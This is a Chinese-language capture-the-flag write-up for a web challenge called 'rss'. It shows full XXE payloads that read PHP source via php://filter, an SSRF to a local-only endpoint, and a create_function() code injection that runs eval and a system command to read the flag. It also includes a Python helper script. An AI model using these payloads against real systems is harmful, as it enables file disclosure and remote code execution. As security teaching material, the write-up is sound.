[Web] rss - LanceaKing

xp0int Posted on Sep 11 2019

跟boring_code一样上传xml payload到百度云，很容易fuzz出xxe。

## XXE to LFI
```xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./index.php">
]>
<rss version="2.0" 
    xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>先知安全技术社区</title>
        <link>http://xz.aliyun.com/forum/</link>
        <description>先知安全技术社区</description>
        <atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
        <language>zh-hans</language>
        <lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
        <item>
            <title>利用Excel power query实现远程DDE执行</title>
            <link>http://xz.aliyun.com/t/5514</link>
            <description><pre>&xxe;</pre></description>
            <pubDate>Tue, 02 Jul 2019 06:03:00 +0800</pubDate>
            <guid>http://xz.aliyun.com/t/5514</guid>
        </item>
    </channel>
</rss>
```
根据index.php里的包含route.php和__autoload()逐步读出所有文件：
![title](https://leanote.com/api/file/getImage?fileId=5d7528a3ab644160a900776c)

## fetch.py
为了方便，我还写了个发送百度云链接、接受返回的base64数据的脚本：
```
import re
import sys
from base64 import b64decode

import requests

BASE = 'http://112.126.96.50:9999'

r = requests.post(BASE + '/fetch', data={'rss_url': sys.argv[1]})
mo = re.search(r'<pre>([a-zA-Z\d\+/\=]+)</pre>', r.text)
if mo is None:
    print('[!] no result')
    sys.exit(-1)

bdata = mo.group(1)
data = b64decode(bdata)
print('[+] success')
print(data.decode())
```

## XXE to SSRF
`/rss_in_order`：需要本地访问，用xxe来ssrf就行了。
![title](https://leanote.com/api/file/getImage?fileId=5d75297eab644162bb0078ae)

`Admin::sort`：里面也是读xml文件，不过不限制url，可以直接读本地文件。
![title](https://leanote.com/api/file/getImage?fileId=5d752a2bab644162bb0078cf)

`/views/Admin.php`：用`create_function()`来创建用于排序的比较函数。
![title](https://leanote.com/api/file/getImage?fileId=5d752a85ab644162bb0078e2)

`create_function()`有代码注入：
![title](https://leanote.com/api/file/getImage?fileId=5d752c24ab644160a90077ff)

## ssrf payload
`http://127.0.0.1/rss_in_order?order=title,$b->title);}phpinfo();die();/*&rss_url=./file/example`

## final payload
```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rss [
    <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://127.0.0.1/rss_in_order?rss_url=.%2Ffile%2Fexample&order=title%2C%24b-%3Etitle%29%3B%7D%40eval%28%24_REQUEST%5Bx%5D%29%3Bdie%28%29%3B%2F%2A&x=system%28%27cat+%2Fflag_eb8ba2eb07702e69963a7d6ab8669134%27%29%3B">
]>
<rss version="2.0" 
    xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>先知安全技术社区</title>
        <link>http://xz.aliyun.com/forum/</link>
        <description>先知安全技术社区</description>
        <atom:link href="http://xz.aliyun.com/forum/feed/" rel="self"></atom:link>
        <language>zh-hans</language>
        <lastBuildDate>Tue, 02 Jul 2019 06:03:00 +0800</lastBuildDate>
        <item>
            <title>利用Excel power query实现远程DDE执行</title>
            <link>http://xz.aliyun.com/t/5514</link>
            <description><pre>&xxe;</pre></description>
            <pubDate>Tue, 02 Jul 2019 06:03:00 +0800</pubDate>
            <guid>http://xz.aliyun.com/t/5514</guid>
        </item>
    </channel>
</rss>
```
![图片标题](https://leanote.com/api/file/getImage?fileId=5d752f5bab644160a9007888)

打赏还是打残，这是个问题